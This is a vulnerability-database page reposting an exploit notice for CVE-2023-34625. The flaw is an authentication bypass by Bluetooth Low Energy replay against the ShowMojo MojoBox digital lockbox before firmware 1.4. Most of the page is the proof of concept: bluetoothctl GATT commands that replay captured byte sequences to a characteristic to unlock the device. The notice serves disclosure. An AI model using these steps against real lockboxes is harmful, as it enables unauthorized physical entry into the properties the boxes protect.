Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2023-34625

Publish Date: 19 Jul 2023

Source

                # Exploit Title: MojoBox v1.4 BLE replay attack
# Exploit Author: Matteo Mandolini
# Date : 15/03/2023
# Vendor Homepage: https://hello.showmojo.com/mojobox/
# Version: &lt;1.4
# CVE: CVE-2023-34625

BLE Replay attack 

ShowMojo MojoBox Digital Lockbox with firmware versione prior to 1.4 is vulnerable to authentication bypass. The implementation of the lock
opening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks.

PoC:
[MojoBox-023516]# gatt.select-attribute ff02
[MojoBox-023516:/service000c/char000f]# gatt.notify on
[CHG] Attribute /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000f Notifying: yes
Notify started
[MojoBox-023516:/service000c/char000d]# gatt.write "0x68 0x01 0x18 0x28 0xFC 0x08 0xE5 0xB9 0xDA 0xDB 0xCE 0x21 0x62 0x1B 0x2A 0xF9 0xBE 0xFB 0x1E 0xE9"
Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d
[MojoBox-023516:/service000c/char000d]# gatt.write "0xA0 0x13 0xEE 0x11 0x94 0x31 0x7D 0xDB 0x16"
Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

MojoBox BLE Replay Attack

Vulmon Search

About

Products

Connect